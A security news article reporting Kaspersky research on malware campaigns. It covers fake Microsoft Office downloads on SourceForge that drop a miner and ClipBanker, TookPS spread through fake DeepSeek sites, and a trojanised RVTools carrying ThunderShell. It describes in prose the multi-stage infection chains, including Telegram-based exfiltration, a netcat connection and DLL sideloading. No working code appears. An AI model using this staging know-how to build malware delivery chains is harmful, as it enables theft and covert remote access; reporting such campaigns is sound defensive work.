Threat actors have been observed distributing malicious payloads such as cryptocurrency miner and clipper malware via SourceForge, a popular software hosting service, under the guise of cracked versions of legitimate applications like Microsoft Office.
“One such project, officepackage, on the main website sourceforge.net, appears harmless enough, containing Microsoft Office add-ins copied from a legitimate GitHub project,” Kaspersky said in a report published today. “The description and contents of officepackage provided below were also taken from GitHub.”
While every project created on sourceforge.net gets assigned a “<project>.sourceforge.io” domain name, the Russian cybersecurity company found that the domain for officepackage, “officepackage.sourceforge[.]io,” displays a long list of Microsoft Office applications and corresponding links to download them in Russian.
On top of that, hovering over the download button reveals a seemingly legitimate URL in the browser status bar: “loading.sourceforge[.]io/download, giving the impression that the download link is associated with SourceForge. However, clicking on the link redirects the user to a completely different page hosted on “taplink[.]cc” that prominently displays another Download button.
Should victims click on the download button, they are served a 7 MB ZIP archive (“vinstaller.zip”), which, when opened, contains a second password-protected archive (“installer.zip”) and a text file with the password to open the file.
Present within the new ZIP file is an MSI installer that’s responsible for creating several files, a console archive utility called “UnRAR.exe,” a RAR archive, and a Visual Basic (VB) script.
“The VB script runs a PowerShell interpreter to download and execute a batch file, confvk, from GitHub,” Kaspersky said. “This file contains the password for the RAR archive. It also unpacks malicious files and runs the next-stage script.”
The batch file is also designed to run two PowerShell scripts, one of which sends system metadata using the Telegram API. The other file downloads another batch script that then acts on the contents of the RAR archive, ultimately launching the miner and clipper malware (aka ClipBanker) payloads.
Also dropped is the netcat executable (“ShellExperienceHost.exe”) that establishes an encrypted connection with a remote server. That’s not all. The confvk batch file has been found to create another file named “ErrorHandler.cmd” that contains a PowerShell script programmed to retrieve and execute a text string through the Telegram API.
The fact that the website has a Russian interface indicates a focus on Russian-speaking users. Telemetry data shows that 90% of potential victims are in Russia, with 4,604 users encountering the scheme between early January and late March.
With the sourceforge[.]io pages indexed by search engines and appearing in search results, it’s believed that Russian users searching for Microsoft Office on Yandex are likely the target of the campaign.
“As users seek ways to download applications outside official sources, attackers offer their own,” Kaspersky said. “While the attack primarily targets cryptocurrency by deploying a miner and ClipBanker, the attackers could sell system access to more dangerous actors.”
The disclosure comes as the company revealed details of a campaign that’s distributing a malware downloader called TookPS via fraudulent sites impersonating the DeepSeek artificial intelligence (AI) chatbot, as well as remote desktop and 3D modeling software.
This includes websites like deepseek-ai-soft[.]com, to which unsuspecting users are redirected to via sponsored Google search results, per Malwarebytes.
TookPS is engineered to download and execute PowerShell scripts that grant remote access to the infected host via SSH, and drop a modified version of a trojan dubbed TeviRat. This highlights the threat actor’s attempts to gain complete access to the victim’s computer in a variety of ways.
“The sample […] uses DLL sideloading to modify and deploy the TeamViewer remote access software onto infected devices,” Kaspersky said. “In simple terms, the attackers place a malicious library in the same folder as TeamViewer, which alters the software’s default behavior and settings, hiding it from the user and providing the attackers with covert remote access.”
The development also follows the discovery of malicious Google ads for RVTools, a popular VMware utility, to deliver a tampered version that’s laced with ThunderShell (aka SMOKEDHAM), a PowerShell-based remote access tool (RAT), underscoring how malvertising remains a persistent and evolving threat.
“ThunderShell, sometimes called SmokedHam, is a publicly available post-exploitation framework designed for red teaming and penetration testing,” Field Effect said. “It provides a command-and-control (C2) environment that allows operators to execute commands on compromised machines through a PowerShell-based agent.”
